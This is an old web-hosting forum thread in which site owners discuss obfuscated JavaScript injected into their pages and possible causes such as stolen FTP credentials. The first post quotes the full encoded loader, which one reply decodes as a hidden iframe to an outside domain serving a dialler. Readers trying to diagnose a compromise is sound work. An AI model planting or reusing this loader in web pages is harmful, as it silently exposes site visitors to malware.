The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How did this javascript get in...

Discussion in 'General Discussion' started by kre8web, Jun 23, 2006.

  1. kre8web

    kre8web Active Member

    Joined:
    Aug 11, 2004
    Messages:
    28
    Likes Received:
    0
    Trophy Points:
    1
    On the 17th of this month a couple of clients reporting a dialler had started popping up on their sites. A closer look revealed the following javascript had been addded and hidden at the bottom of the page.

    <script language="JavaScript">
    e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
    </script>

    Now my question is how have they managed to get this javascript onto the page? Im presuming theres either been a server or security issue somewhere, however one of the effected sites uses no scripting outside of password protected cms. Any thoughts would be greatly appreciated:)
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
  3. kre8web

    kre8web Active Member

    Joined:
    Aug 11, 2004
    Messages:
    28
    Likes Received:
    0
    Trophy Points:
    1
    Hmm, the problem is that the server in question is not one i have root access to, indeed its a 3rd party host who are refusing to accept responsibility. They keep suggesting its a secuirty hole in one of the scripts running on the site, which i mean is quite possible i guess, however the same scripts are running on over 14 other sites on differetn servers and hosts without problem. The server is cPanel based so i'm going to try disabling enable_dl via htaccess in the root and see if that solves it.
     
  4. richy

    richy Well-Known Member

    Joined:
    Jun 30, 2003
    Messages:
    276
    Likes Received:
    1
    Trophy Points:
    16
    We've seen this as well recently - IIRC the user in question hadn't updated their antivirus in over 3 months and had recently made changes to the "infected pages" which indicates a virus is changing HTML pages on their harddrives and when they update their site.. Boom!
     
  5. reliableDerrick

    reliableDerrick Registered
    PartnerNOC

    Joined:
    Jul 28, 2005
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    After I figured out how to decode the javascript there (replace document.write with alert), it turns out to be some html for a hidden iframe going to dnv-counter.com/trf, and while the site isn't up now, I don't recommend anyone try to visit it. Google hasn't turned up many results, and it seems like anti-virus programs aren't detecting the virus:

    http://www.castlecops.com/postx160127-0-0.html
    http://forums.pcapex.com/windows_os_problems/79078-what_the_hell_is_23100247_exe.html

    I'm not sure if the second one is the same sort of infection (they were less subtle about making those iframes before), but it seems like the same basic principal. My best guess at the moment is that they're either inserting the javascript into the pages as they're being uploaded, or catching the FTP usernames and passwords, sending them back to the central server, and then uploading modified files themselves.

    Could someone who's had their html files infected run task manager and see if you have and weird processes like c:\23423523.exe running, like in the pcapex thread?
     
    #5 reliableDerrick, Jul 23, 2006
    Last edited: Jul 23, 2006
Loading...

Share This Page